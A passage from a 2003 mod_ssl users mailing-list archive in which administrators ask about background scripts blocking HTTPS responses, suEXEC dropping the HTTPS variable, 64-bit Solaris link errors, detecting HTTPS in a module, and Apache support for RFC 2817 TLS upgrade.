>>certain directives which are being passed on to the IMAP server (ref:
>>    
>>
>"start
>  
>
>>the script on port 143")?  If this is the case, it sounds like what you're
>>intending to do is start a "fire and forget" script .. not being concerned
>>about the return value from the script.  If that's the case, you may want
>>    
>>
>to
>  
>
>>look at creating a IPC process of some sort that can be left to fend for
>>itself after being started, allowing a response to get back to the user.
>>
>>Is this an accurate assessment of what you're trying to do?
>>
>>-dsp
>>
>>-----Original Message-----
>>From: owner-modssl-users@modssl.org
>>[mailto:owner-modssl-users@modssl.org]On Behalf Of Vincent KERAVEC
>>Sent: Monday, September 01, 2003 11:32 AM
>>To: modssl-users@modssl.org
>>Subject: Modssl wait background script to finish
>>
>>
>>Hello,
>>I've got a problem with modssl. When I run a script in background, the
>>server doesn't respond to the browser who start the script on port 143
>>until the script finish. The server continue to reply to all other browser.
>>
>>I'm running Apache/2.0.40 (Red Hat Linux) with mod_ssl/2.0.40 and
>>OpenSSL/0.9.7a. I'm also using client side authentication.
>>
>>Is there something to change in the ssl configuration to allow
>>background process ?
>>
>>Thanks,
>>Vincent KERAVEC
>>
>>ps : When i put modssl in loglevel debug the server seems to wait after
>>this message :
>>   [Wed Aug 27 15:10:30 2003] [debug]
>>/usr/src/build/250859-i386/BUILD/httpd-2.0.40/modules/ssl/ssl_engine_io.c(1
>>    
>>
>0
>  
>
>>05):
>>
>>
>>+-------------------------------------------------------------------------+
>>[Wed Aug 27 15:10:30 2003] [info] Initial (No.1) HTTPS request received
>>for child 0 (server ***.****.***:443)
>>
>>
>>
>>______________________________________________________________________
>>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>>User Support Mailing List                      modssl-users@modssl.org
>>Automated List Manager                            majordomo@modssl.org
>>
>>
>>    
>>
>
>
>______________________________________________________________________
>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>User Support Mailing List                      modssl-users@modssl.org
>Automated List Manager                            majordomo@modssl.org
>  
>

--------------ms040509010102040205000205
Content-Type: application/x-pkcs7-signature; name="smime.p7s"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="smime.p7s"
Content-Description: S/MIME Cryptographic Signature

MIAGCSqGSIb3DQEHAqCAMIACAQExCzAJBgUrDgMCGgUAMIAGCSqGSIb3DQEHAQAAoIIMjzCC
A9swggLDoAMCAQICAQIwDQYJKoZIhvcNAQEEBQAwTzELMAkGA1UEBhMCRlIxDDAKBgNVBAoT
A0NSVTESMBAGA1UEAxMJYWMtcmFjaW5lMR4wHAYJKoZIhvcNAQkBFg9jYS1hZG1pbkBjcnUu
ZnIwHhcNMDMwNTE2MDkzMTE3WhcNMTIxMjE0MDkzMTE3WjBUMQswCQYDVQQGEwJGUjEMMAoG
A1UEChMDQ1JVMRcwFQYDVQQDEw5hYy11dGlsaXNhdGV1cjEeMBwGCSqGSIb3DQEJARYPY2Et
YWRtaW5AY3J1LmZyMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAtXGYMirQ2feu
6b4FDrH8PRwIyjfXPSXaG33GoatYJIbOmxAwnGbwVBng3WDzoW5X45RWq93nOxSdx4MTsGQJ
pBihob2h4XeGpL54WlLd+kvOxvp/0OzLYYcESI3dpVRjf6jB8Ggc7BUlE+ptIjyXAVTNKz1o
6aiLSR6G1zG5cidq3BAXjlpfvbX9EWfICcnmLMSQ29oam857EsAJRuGHNajdPEMUlsioEIf2
Zf4YL9pa5rJ5Efs7NTxu8ffICGYlCynJXJTC461sRrub8s6SOM69NTw8EM+1A3ewd5WyGkZe
QSG7SJyJY8Lg8u4CMoflOjP3LSYhCLI1Ic0gX08dkQIDAQABo4G8MIG5MA8GA1UdEwEB/wQF
MAMBAf8wHQYDVR0OBBYEFBUKfCi1rKa81/0yMx15vbNJCjGQMHcGA1UdIwRwMG6AFK8vz0qV
BLbeJLMJqVU+XA4c+HEuoVOkUTBPMQswCQYDVQQGEwJGUjEMMAoGA1UEChMDQ1JVMRIwEAYD
VQQDEwlhYy1yYWNpbmUxHjAcBgkqhkiG9w0BCQEWD2NhLWFkbWluQGNydS5mcoIBADAOBgNV
HQ8BAf8EBAMCAQYwDQYJKoZIhvcNAQEEBQADggEBAMG/+LofN2vISFWieXrHsFsIrM/2WUhf
zAcE2/Ga+/UWvJaDJO9RlbUNN3l+f40L1yUJW9kZqY4XMBcbJ6jbpmeJ+zTf+zveAD/sl9ZN
qoC931HFLq/TGjZSIQxX4Nxad9DFbok66X1qfRZF4+beaz2zjrF07LvjWX6201Rc6zQhNyTy
UdO/wYY0EBYu0CFrTK4RxS6d2LsyO1p1Xj7oMCa9Utmu/igZoXJYL709POBKHJoYNU+LI6iJ
8aYcZupJ/GXVxfj68L1KP2i8cM3a570bJCDbsKcchzZqsvII5cewU7KKPH4fyMyfsA39tJ0V
BMQyvdWZHpS75DN0eB5UVzUwggRUMIIDPKADAgECAgIArzANBgkqhkiG9w0BAQQFADBUMQsw
CQYDVQQGEwJGUjEMMAoGA1UEChMDQ1JVMRcwFQYDVQQDEw5hYy11dGlsaXNhdGV1cjEeMBwG
CSqGSIb3DQEJARYPY2EtYWRtaW5AY3J1LmZyMB4XDTAzMDgwNDA5MDY1MVoXDTA0MDIwNDA5
MDY1MVowdjELMAkGA1UEBhMCRlIxJjAkBgNVBAoTHUNvbWl0ZSBSZXNlYXUgZGVzIFVuaXZl
cnNpdGVzMRgwFgYDVQQDEw9WaW5jZW50IEtlcmF2ZWMxJTAjBgkqhkiG9w0BCQEWFnZpbmNl
bnQua2VyYXZlY0BjcnUuZnIwgZ8wDQYJKoZIhvcNAQEBBQADgY0AMIGJAoGBAJzgzJhRsdK7
COdmWp/pUedGyXgStXGuQqVP9d0biQ4EBngiDhSt2rNYNKjaYg362nAy3tGxXIxLVaAziSnz
ES35pAIaM4X+FJ5F6bcABhtdeE3MSGKWnTPEk9pe6iOH2lYiwHzWx3UxlCK6nX5LIh182kKm
I5JoxlqJ4jb933H7AgMBAAGjggGQMIIBjDAMBgNVHRMBAf8EAjAAMBEGCWCGSAGG+EIBAQQE
AwIEsDAOBgNVHQ8BAf8EBAMCBeAwcAYJYIZIAYb4QgENBGMWYUNlcnRpZmljYXQgYWMtdXRp
bGlzYXRldXIuIFBvdXIgdG91dGUgaW5mb3JtYXRpb24gc2UgcmVwb3J0ZXIg4CBodHRwOi8v
aWdjLmNydS5mci9hYy11dGlsaXNhdGV1ci8wHQYDVR0OBBYEFFs58KNky28A7glEun75Mmhk
wCN0MHcGA1UdIwRwMG6AFBUKfCi1rKa81/0yMx15vbNJCjGQoVOkUTBPMQswCQYDVQQGEwJG
UjEMMAoGA1UEChMDQ1JVMRIwEAYDVQQDEwlhYy1yYWNpbmUxHjAcBgkqhkiG9w0BCQEWD2Nh
LWFkbWluQGNydS5mcoIBAjBPBgNVHR8ESDBGMESgQqBAhj5odHRwOi8vaWdjLmNydS5mci9j
Z2ktYmluL2xvYWRjcmw/Q0E9YWMtdXRpbGlzYXRldXImZm9ybWF0PURFUjANBgkqhkiG9w0B
AQQFAAOCAQEAgMl91vNCS/NYGWcceN3Y5HcCPZ8qzR+PWwulEmLpbdAyZDf1iYP8GmQfD/SN
RKMCOXfkqs9CGNt5pm3ukYab4eVLeAHO14Ym73Q7gsMOXd+0EdTVH2iryc9VJB+wrfNruLE8
NCCca3Ef/SWnyYyzQBRAI7CiInUUsC41+P55vi1u5MH5WFYGAwOXCNPeS5Rm+tV3FiO67Azy
bNtX9qOUpIFTeLSzpC27SqyFUeJSRRU2zwjRVaJ6ASUzOSF4dGj0Re1vFMNdcfeYtvLdSYZo
4/Mg6pNQnqHzldbkWc8pP1RUzRr27e3iT3t9sks0HQOhujJINur00pPk2elURPefIjCCBFQw
ggM8oAMCAQICAgCvMA0GCSqGSIb3DQEBBAUAMFQxCzAJBgNVBAYTAkZSMQwwCgYDVQQKEwND
UlUxFzAVBgNVBAMTDmFjLXV0aWxpc2F0ZXVyMR4wHAYJKoZIhvcNAQkBFg9jYS1hZG1pbkBj
cnUuZnIwHhcNMDMwODA0MDkwNjUxWhcNMDQwMjA0MDkwNjUxWjB2MQswCQYDVQQGEwJGUjEm
MCQGA1UEChMdQ29taXRlIFJlc2VhdSBkZXMgVW5pdmVyc2l0ZXMxGDAWBgNVBAMTD1ZpbmNl
bnQgS2VyYXZlYzElMCMGCSqGSIb3DQEJARYWdmluY2VudC5rZXJhdmVjQGNydS5mcjCBnzAN
BgkqhkiG9w0BAQEFAAOBjQAwgYkCgYEAnODMmFGx0rsI52Zan+lR50bJeBK1ca5CpU/13RuJ
DgQGeCIOFK3as1g0qNpiDfracDLe0bFcjEtVoDOJKfMRLfmkAhozhf4UnkXptwAGG114TcxI
YpadM8ST2l7qI4faViLAfNbHdTGUIrqdfksiHXzaQqYjkmjGWoniNv3fcfsCAwEAAaOCAZAw
ggGMMAwGA1UdEwEB/wQCMAAwEQYJYIZIAYb4QgEBBAQDAgSwMA4GA1UdDwEB/wQEAwIF4DBw
BglghkgBhvhCAQ0EYxZhQ2VydGlmaWNhdCBhYy11dGlsaXNhdGV1ci4gUG91ciB0b3V0ZSBp
bmZvcm1hdGlvbiBzZSByZXBvcnRlciDgIGh0dHA6Ly9pZ2MuY3J1LmZyL2FjLXV0aWxpc2F0
ZXVyLzAdBgNVHQ4EFgQUWznwo2TLbwDuCUS6fvkyaGTAI3QwdwYDVR0jBHAwboAUFQp8KLWs
przX/TIzHXm9s0kKMZChU6RRME8xCzAJBgNVBAYTAkZSMQwwCgYDVQQKEwNDUlUxEjAQBgNV
BAMTCWFjLXJhY2luZTEeMBwGCSqGSIb3DQEJARYPY2EtYWRtaW5AY3J1LmZyggECME8GA1Ud
HwRIMEYwRKBCoECGPmh0dHA6Ly9pZ2MuY3J1LmZyL2NnaS1iaW4vbG9hZGNybD9DQT1hYy11
dGlsaXNhdGV1ciZmb3JtYXQ9REVSMA0GCSqGSIb3DQEBBAUAA4IBAQCAyX3W80JL81gZZxx4
3djkdwI9nyrNH49bC6USYult0DJkN/WJg/waZB8P9I1EowI5d+Sqz0IY23mmbe6Rhpvh5Ut4
Ac7XhibvdDuCww5d37QR1NUfaKvJz1UkH7Ct82u4sTw0IJxrcR/9JafJjLNAFEAjsKIidRSw
LjX4/nm+LW7kwflYVgYDA5cI095LlGb61XcWI7rsDPJs21f2o5SkgVN4tLOkLbtKrIVR4lJF
FTbPCNFVonoBJTM5IXh0aPRF7W8Uw11x95i28t1Jhmjj8yDqk1CeofOV1uRZzyk/VFTNGvbt
7eJPe32ySzQdA6G6Mkg26vTSk+TZ6VRE958iMYICjTCCAokCAQEwWjBUMQswCQYDVQQGEwJG
UjEMMAoGA1UEChMDQ1JVMRcwFQYDVQQDEw5hYy11dGlsaXNhdGV1cjEeMBwGCSqGSIb3DQEJ
ARYPY2EtYWRtaW5AY3J1LmZyAgIArzAJBgUrDgMCGgUAoIIBiTAYBgkqhkiG9w0BCQMxCwYJ
KoZIhvcNAQcBMBwGCSqGSIb3DQEJBTEPFw0wMzA5MDQwODU1MDZaMCMGCSqGSIb3DQEJBDEW
BBT/1w2IPps6AMPQSR8R8e4qc7n/QjBSBgkqhkiG9w0BCQ8xRTBDMAoGCCqGSIb3DQMHMA4G
CCqGSIb3DQMCAgIAgDANBggqhkiG9w0DAgIBQDAHBgUrDgMCBzANBggqhkiG9w0DAgIBKDBp
BgkrBgEEAYI3EAQxXDBaMFQxCzAJBgNVBAYTAkZSMQwwCgYDVQQKEwNDUlUxFzAVBgNVBAMT
DmFjLXV0aWxpc2F0ZXVyMR4wHAYJKoZIhvcNAQkBFg9jYS1hZG1pbkBjcnUuZnICAgCvMGsG
CyqGSIb3DQEJEAILMVygWjBUMQswCQYDVQQGEwJGUjEMMAoGA1UEChMDQ1JVMRcwFQYDVQQD
Ew5hYy11dGlsaXNhdGV1cjEeMBwGCSqGSIb3DQEJARYPY2EtYWRtaW5AY3J1LmZyAgIArzAN
BgkqhkiG9w0BAQEFAASBgJowMsreTU59bX0JbyHWGsTHJCQV6hVxlIWK9Hzw86ayDu8KG9Ei
NkWyZwvKQ7csAeDj8jXIrqWN5JfpzeZ+rZvVppTeWRl6X1WxMVap3zAZdDegC+Va6mzbzxK8
1qB5+79lqJ9HT36omWYM2+bZwT7bujJl8xMmvZtnfAQEz17VAAAAAAAA
--------------ms040509010102040205000205--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Sep  4 15:40:05 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 28F6AA8941; Thu,  4 Sep 2003 15:40:05 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from fermat.math.technion.ac.il (fermat.math.technion.ac.il [132.68.115.6])
	by master.modssl.org (Postfix) with ESMTP id 5A8BFA8935
	for ; Thu,  4 Sep 2003 15:40:03 +0200 (CEST)
Received: from fermat.math.technion.ac.il (localhost [127.0.0.1])
	by fermat.math.technion.ac.il (8.12.1/8.12.8) with ESMTP id h84DdxXs027397
	for ; Thu, 4 Sep 2003 16:39:59 +0300 (IDT)
Received: (from rl@localhost)
	by fermat.math.technion.ac.il (8.12.1/8.12.1/Submit) id h84DdpLP027395
	for modssl-users@modssl.org; Thu, 4 Sep 2003 16:39:51 +0300 (IDT)
X-Authentication-Warning: fermat.math.technion.ac.il: rl set sender to rl@math.technion.ac.il using -f
Date: Thu, 4 Sep 2003 16:39:51 +0300
From: "Zvi Har'El" 
To: Mod-ssl Users 
Subject: [rl@math.technion.ac.il: HTTPS env var in suexec]
Message-ID: <20030904133951.GE19610@fermat.math.technion.ac.il>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
Content-Transfer-Encoding: quoted-printable
User-Agent: Mutt/1.4.1i
Hebrew-Date: 7 Elul 5763
X-PGP-Public-Key: http://www.math.technion.ac.il/~rl/pubkey.html
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Zvi Har'El" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

----- Forwarded message from Zvi Har'El  -----

Date: Tue, 26 Aug 2003 16:47:52 +0300
From: Zvi Har'El 
To: Apache Developer List 
Subject: HTTPS env var in suexec
Hebrew-Date: 28 Av 5763

Hi,

In apache_1.3.28, running a cgi with suEXEC has a problem to identify SSL
connections using the normal enviroment HTTPS=3Don setting, since suexec.c =
in
this distribution (in line 137) has in the safe variable list the string
"HTTPS_" for a prefix, and doesn't have the string "HTTPS=3D". This has been
fixed in apache 2, but can you please also fix it in apache 1.3?

Thanks,

Zvi.

--=20
Dr. Zvi Har'El     mailto:rl@math.technion.ac.il     Department of Mathemat=
ics
tel:+972-54-227607 icq:179294841     Technion - Israel Institute of Technol=
ogy
fax:+972-4-8293388 http://www.math.technion.ac.il/~rl/     Haifa 32000, ISR=
AEL
"If you can't say somethin' nice, don't say nothin' at all." -- Thumper (19=
42)
                                  Tuesday, 28 Av 5763, 26 August 2003,  4:4=
3PM

----- End forwarded message -----

--=20
Dr. Zvi Har'El     mailto:rl@math.technion.ac.il     Department of Mathemat=
ics
tel:+972-54-227607 icq:179294841     Technion - Israel Institute of Technol=
ogy
fax:+972-4-8293388 http://www.math.technion.ac.il/~rl/     Haifa 32000, ISR=
AEL
"If you can't say somethin' nice, don't say nothin' at all." -- Thumper (19=
42)
                             Thursday, 7 Elul 5763,  4 September 2003,  4:3=
9PM
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Sep  5 22:15:23 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 8497DA8946; Fri,  5 Sep 2003 22:15:23 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from darkknight.cicat.com (admintools.cicat.com [65.201.165.16])
	by master.modssl.org (Postfix) with SMTP id 0727FA8936
	for ; Fri,  5 Sep 2003 22:15:21 +0200 (CEST)
Received: (qmail 17589 invoked from network); 5 Sep 2003 20:15:19 -0000
Received: from unknown (HELO ?10.0.1.106?) (65.201.165.130)
  by mail.telcoexchange.com with SMTP; 5 Sep 2003 20:15:19 -0000
Subject: Problem compiling Apache with modssl on Sparc 9 with 64 bit openssl
From: Dmitry Bocharnikov 
To: modssl-users 
Content-Type: text/plain
Organization: Telco Exchange, Inc
Message-Id: <1062793004.28140.102.camel@dev01>
Mime-Version: 1.0
X-Mailer: Ximian Evolution 1.2.4 
Date: 05 Sep 2003 16:16:44 -0400
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Dmitry Bocharnikov 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi, I'm having a problem compiling apache with modssl support on a
solaris platform. I've had to compile openssl as "solaris64-sparcv9-gcc"
otherwise after a default configuration compilation process would give
me a fatal error in dhparam.o file - wrong elf class (ELFCLASS64)


if [ "solaris-shared" = "hpux-shared" -o "solaris-shared" = 
"darwin-shared" ] ; then \
 gcc -o openssl -DMONOLITH -I.. -I../include  
-DOPENSSL_SYSNAME_ULTRASPARC -DOPENSSL_THREADS -D_REENTRANT -DDSO_DLFCN 
-DHAVE_DLFCN_H -DOPENSSL_NO_KRB5 -m32 -mcpu=ultrasparc -O3 
-fomit-frame-pointer -Wall -DB_ENDIAN -DBN_DIV2W -DMD5_ASM openssl.o 
verify.o asn1pars.o req.o dgst.o
dh.o dhparam.o enc.o passwd.o gendh.o errstr.o ca.o pkcs7.o crl2p7.o 
crl.o rsa.o rsautl.o dsa.o dsaparam.o x509.o genrsa.o gendsa.o 
s_server.o s_client.o speed.o s_time.o apps.o s_cb.o s_socket.o 
app_rand.o version.o sess_id.o ciphers.o nseq.o pkcs12.o pkcs8.o spkac.o
smime.o rand.o engine.o ocsp.o  ../libssl.a  ../libcrypto.a -lsocket 
-lnsl -ldl ; \
else \
 gcc -o openssl -DMONOLITH -I.. -I../include  
-DOPENSSL_SYSNAME_ULTRASPARC -DOPENSSL_THREADS -D_REENTRANT -DDSO_DLFCN 
-DHAVE_DLFCN_H -DOPENSSL_NO_KRB5 -m32 -mcpu=ultrasparc -O3 
-fomit-frame-pointer -Wall -DB_ENDIAN -DBN_DIV2W -DMD5_ASM openssl.o 
verify.o asn1pars.o req.o dgst.o
dh.o dhparam.o enc.o passwd.o gendh.o errstr.o ca.o pkcs7.o crl2p7.o 
crl.o rsa.o rsautl.o dsa.o dsaparam.o x509.o genrsa.o gendsa.o 
s_server.o s_client.o speed.o s_time.o apps.o s_cb.o s_socket.o 
app_rand.o version.o sess_id.o ciphers.o nseq.o pkcs12.o pkcs8.o spkac.o
smime.o rand.o engine.o ocsp.o  -L.. -lssl  -L.. -lcrypto -lsocket -lnsl
-ldl ; \
fi
ld: fatal: file dhparam.o: wrong ELF class: ELFCLASS64
ld: fatal: File processing errors. No output written to openssl
collect2: ld returned 1 exit status

However, this error does not happen if I compile for solaris64. Then
when I compile apache with modssl at the very end of build process when
the httpd binary is created I get the following errors:


 -DSOLARIS2=290 -DMOD_SSL=208112 -DEAPI -DEAPI_MM -DUSE_EXPAT 
-I./lib/expat-lite -DNO_DL_NEEDED `./apaci` 
-L/export/home/iknlots/local/openssl/lib 
-L/export/home/iknlots/src/mm-1.2.1/.libs   \
     -o httpd buildmark.o modules.o modules/ssl/libssl.a 
modules/jserv/libjserv.a modules/standard/libstandard.a main/libmain.a 
./os/unix/libos.a ap/libap.a  lib/expat-lite/libexpat.a  -Lmodules/jserv
-L../modules/jserv -L../../modules/jserv -ljserv  -lsocket -lnsl 
-lpthread  -lssl -lcrypto -lmm
ld: warning: file 
/export/home/iknlots/local/openssl/lib/libssl.a(s2_srvr.o): wrong ELF
class: ELFCLASS64
ld: warning: file 
/export/home/iknlots/local/openssl/lib/libcrypto.a(bn_lib.o): wrong ELF 
class: ELFCLASS64
Undefined                       first referenced
symbol                             in file
d2i_SSL_SESSION                    
modules/ssl/libssl.a(ssl_scache_dbm.o)
SSL_get_verify_mode                 
modules/ssl/libssl.a(ssl_engine_kernel.o)
SSL_library_init                   
modules/ssl/libssl.a(ssl_engine_init.o)
.......
sk_num                             
modules/ssl/libssl.a(ssl_engine_init.o)
d2i_X509                           
modules/ssl/libssl.a(ssl_engine_init.o)
SSL_accept                          
modules/ssl/libssl.a(ssl_engine_kernel.o)
X509_NAME_oneline                  
modules/ssl/libssl.a(ssl_engine_init.o)
ERR_get_error                      
modules/ssl/libssl.a(ssl_engine_log.o)
ld: fatal: Symbol referencing errors. No output written to httpd
collect2: ld returned 1 exit status
make[2]: *** [target_static] Error 1


Has anyone see anything like that before?

Thank you,
-- 
Dmitry Bocharnikov
Telco Exchange, Inc
http://www3.telcoexchange.com
(703) 359-6184

This message may contain information that is proprietary to Telco
Exchange, its customers, and partners. If you have received it in error,
please notify Telco Exchange immediately.

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Sep 12 02:41:59 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 9C7C2A8965; Fri, 12 Sep 2003 02:41:59 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from superspawn.javien.com (javien1.spots.ab.ca [209.115.168.130])
	by master.modssl.org (Postfix) with ESMTP id 268FBA8933
	for ; Fri, 12 Sep 2003 02:41:55 +0200 (CEST)
Received: from KEN-NT.javien.com (h68-146-161-64.cg.shawcable.net [68.146.161.64])
	by superspawn.javien.com (8.11.6/8.11.6) with ESMTP id h8C0foA28746
	for ; Thu, 11 Sep 2003 18:41:51 -0600
Message-Id: <4.3.2.7.2.20030911183453.0283eec8@127.0.0.1>
X-Sender: mail.javien.com:ken@127.0.0.1
X-Mailer: QUALCOMM Windows Eudora Version 4.3.2
Date: Thu, 11 Sep 2003 18:42:53 -0600
To: modssl-users@modssl.org
From: Ken Kittlitz 
Subject: Determining if request was made via HTTPS
In-Reply-To: <20030911133318.02EA0A895F@master.modssl.org>
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"; format=flowed
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Ken Kittlitz 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi all,

I'm writing an Apache module that needs to determine if a request came in 
via HTTP or HTTPS.  Does mod_ssl provide some interface that other modules 
can use to determine this? Clearly, mod_cgi figures this out somehow, 
because it correctly sets the "HTTPS" environment variable, but I don't 
understand how it figures this out.  I can't find anything in the request 
record that would let me tell the difference between an incoming HTTPS 
request and an HTTP one.

Any help would be appreciated. Thanks!
---
Ken Kittlitz
Vice-President, Javien Canada Inc.
http://www.javien.com

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Sep 12 15:42:19 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id A2940A8968; Fri, 12 Sep 2003 15:42:19 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from ns.nexgen-private (ABoulogne-111-1-3-46.w193-253.abo.wanadoo.fr [193.253.245.46])
	by master.modssl.org (Postfix) with ESMTP id E7964A8933
	for ; Fri, 12 Sep 2003 15:42:17 +0200 (CEST)
Received: from adrien (adrien.nexgen-private [10.1.12.1])
	by ns.nexgen-private (8.10.2/8.10.2) with SMTP id h8CDTi430064
	for ; Fri, 12 Sep 2003 15:29:44 +0200
Message-ID: <003c01c37933$addb4fb0$010c010a@adrien>
From: "Adrien Felon" 
To: 
Subject: Are "client requested update" supported?
Date: Fri, 12 Sep 2003 15:42:16 +0200
Organization: NexGen Software
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2800.1158
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1165
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Adrien Felon" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi,

I would like to try some client side requested upgrade to HTTP over TLS (cf.
section 3 of RFC2817). For that I had apache loading mod_ssl and I try to
send the following data to the server (using a telnet on port 80):

OPTIONS * HTTP/1.1\r\n
Host: ...\r\n
Upgrade: TLS/1.0\r\n
Connection: Upgrade\r\n
\r\n

I got "HTTP/1.1 200 Ok\r\n..." response instead of "HTTP/1.1 101 Switching
Protocols\r\n".  I start to wonder if apache actually supports this... As
https works fine, I think my openssl/mod_ssl config is up and running.

It sounds like a dummy question to me but I walk through the docs without
the response.

Thanks in advance,

Adrien Felon


---
Outgoing mail is certified Virus Free.
Checked by AVG anti-virus system (http://www.grisoft.com).
Version: 6.0.516 / Virus Database: 313 - Release Date: 01/09/2003


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Sep 12 16:00:37 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 3DCDAA8965; Fri, 12 Sep 2003 16:00:37 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from toftum.dk (toftum.dk [193.88.12.46])
	by master.modssl.org (Postfix) with ESMTP id A61BFA8933
	for ; Fri, 12 Sep 2003 16:00:35 +0200 (CEST)
Received: by toftum.dk (Postfix, from userid 1001)
	id D055B6E418E; Fri, 12 Sep 2003 16:00:29 +0200 (CEST)
Date: Fri, 12 Sep 2003 16:00:29 +0200
From: Mads Toftum 
To: modssl-users@modssl.org
Subject: Re: Are "client requested update" supported?
Message-ID: <20030912140029.GC16449@toftum.dk>
Mail-Followup-To: modssl-users@modssl.org
References: <003c01c37933$addb4fb0$010c010a@adrien>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <003c01c37933$addb4fb0$010c010a@adrien>
X-Mailer: mutt
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Mads Toftum 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Fri, Sep 12, 2003 at 03:42:16PM +0200, Adrien Felon wrote:
> Hi,
> 
> I would like to try some client side requested upgrade to HTTP over TLS (cf.
> section 3 of RFC2817). For that I had apache loading mod_ssl and I try to
> send the following data to the server (using a telnet on port 80):
> 
> OPTIONS * HTTP/1.1\r\n
> Host: ...\r\n
> Upgrade: TLS/1.0\r\n
> Connection: Upgrade\r\n
> \r\n
> 
> I got "HTTP/1.1 200 Ok\r\n..." response instead of "HTTP/1.1 101 Switching
> Protocols\r\n".  I start to wonder if apache actually supports this... As
> https works fine, I think my openssl/mod_ssl config is up and running.
> 
> It sounds like a dummy question to me but I walk through the docs without
> the response.
> 
Up to version 2.0.x the answer is that there is no support for it.
For 2.1.x there might be some initial code to take care of that, but even if
it did make it into the tree, then it is more or less untested because there
are no clients for it.

vh

Mads Toftum
-- 
`Darn it, who spiked my coffee with water?!' - lwall

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Sep 12 18:04:49 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 8852CA8965; Fri, 12 Sep 2003 18:04:49 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from ns.nexgen-private (ABoulogne-111-1-3-46.w193-253.abo.wanadoo.fr [193.253.245.46])
	by master.modssl.org (Postfix) with ESMTP id 6AE30A8933
	for ; Fri, 12 Sep 2003 18:04:43 +0200 (CEST)
Received: from adrien (adrien.nexgen-private [10.1.12.1])
	by ns.nexgen-private (8.10.2/8.10.2) with SMTP id h8CFq9430094
	for ; Fri, 12 Sep 2003 17:52:09 +0200
Message-ID: <006201c37947$9354e840$010c010a@adrien>
From: "Adrien Felon" 
To: 
References: <003c01c37933$addb4fb0$010c010a@adrien> <20030912140029.GC16449@toftum.dk>
Subject: Re: Are "client requested update" supported?
Date: Fri, 12 Sep 2003 18:04:41 +0200
Organization: NexGen Software
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2800.1158
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1165
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Adrien Felon" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

> Up to version 2.0.x the answer is that there is no support for it.
> For 2.1.x there might be some initial code to take care of that, but even
if
